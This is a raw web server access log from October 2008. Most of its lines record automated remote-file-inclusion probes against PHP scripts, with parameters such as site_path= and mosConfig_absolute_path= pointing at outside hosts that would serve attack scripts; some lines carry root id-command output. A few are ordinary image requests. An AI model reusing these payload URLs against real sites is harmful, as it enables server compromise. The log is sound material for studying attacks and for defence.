98.136.50.138 - - [26/Oct/2008:09:34:35 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:34:37 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/008.jpg HTTP/1.1" 200 330794 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:34:41 -0700] "GET /logs/access_080908.log%20/?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:34:42 -0700] "GET /logs/access_081015.log//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:34:42 -0700] "GET /include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:34:42 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:09:34:54 -0700] "GET /logs/access_080828.log/errors.php?error=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:09:34:54 -0700] "GET /logs/errors.php?error=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.20.53.210 - - [26/Oct/2008:09:34:54 -0700] "GET /errors.php?error=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:34:59 -0700] "GET /logs/access_080908.log%20/?sIncPath=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:35:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-162.jpg HTTP/1.1" 200 647514 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:35:02 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:09:35:02 -0700] "GET /phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:09:35:03 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:35:11 -0700] "GET /logs/access_080904.log//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:14 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:35:14 -0700] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:35:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-023_0.jpg HTTP/1.1" 200 348241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:23 -0700] "GET /logs/access_080412.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:35:30 -0700] "GET /logs/access_081015.log//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:35:31 -0700] "GET /include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:35:31 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:33 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:33 -0700] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:35:33 -0700] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:35:33 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:35:34 -0700] "GET /logs/access_080412.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:37 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:37 -0700] "GET /logs/access_080806.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:40 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:40 -0700] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:35:40 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:03 -0700] "GET /logs/access_080412.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:11 -0700] "GET /errors.php?error=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:11 -0700] "GET /logs/access_080828.log/errors.php?error=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:11 -0700] "GET /logs/errors.php?error=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:36:12 -0700] "GET /logs/access_080905.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:36:12 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:12 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-038_0.jpg HTTP/1.1" 200 247996 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:25 -0700] "GET /logs/access_080825.log/errors.php?error=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:36 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:36:36 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:36:39 -0700] "GET /logs/access_080905.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:36:41 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:36:41 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:36:41 -0700] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:36:41 -0700] "GET /logs/access_080412.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:36:48 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:36:48 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:36:48 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.86.146.149 - - [26/Oct/2008:09:36:50 -0700] "GET /logs/access_080905.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.midportal.com///upload/image/httpd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.86.146.149 - - [26/Oct/2008:09:36:50 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.midportal.com///upload/image/httpd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.86.146.149 - - [26/Oct/2008:09:36:50 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.midportal.com///upload/image/httpd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:36:51 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:36:57 -0700] "GET /logs/access_080905.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:36:57 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:36:57 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:37:02 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:37:02 -0700] "GET /logs/access_080905.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:37:02 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.111.80.12 - - [26/Oct/2008:09:37:10 -0700] "GET /logs/access_080825.log/errors.php?error=http://music.tigueraje.com/js/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:37:11 -0700] "GET /logs/access_080819.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.108.193.138 - - [26/Oct/2008:09:37:21 -0700] "GET /logs/access_081007.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.108.193.138 - - [26/Oct/2008:09:37:22 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:37:23 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:37:30 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jockey.mn/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:37:31 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jockey.mn/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.86.146.149 - - [26/Oct/2008:09:37:36 -0700] "GET /logs/access_080819.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.midportal.com///upload/image/httpd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:37:39 -0700] "GET /logs/access_080819.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:37:44 -0700] "GET /logs/access_080819.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.111.80.12 - - [26/Oct/2008:09:37:52 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jockey.mn/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:37:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0058.jpg HTTP/1.1" 200 409366 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:38:00 -0700] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:38:00 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:05 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:06 -0700] "GET /phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:08 -0700] "GET /logs/access_080904.log//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:09:38:25 -0700] "GET /admin/classes/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:38:33 -0700] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:38:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037.jpg HTTP/1.1" 200 308570 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:38:34 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:38 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.108.193.138 - - [26/Oct/2008:09:38:38 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=100(users)%20groups=14(uucp),16(dialout),17(audio),33(video),100(users)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:38:42 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:38:44 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:38:44 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:38:44 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:45 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:45 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:38:45 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:51 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:51 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:38:52 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:54 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:38:56 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:39:00 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:39:03 -0700] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:03 -0700] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:07 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:39:07 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:07 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 200 94845 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:07 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 200 94845 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:39:07 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
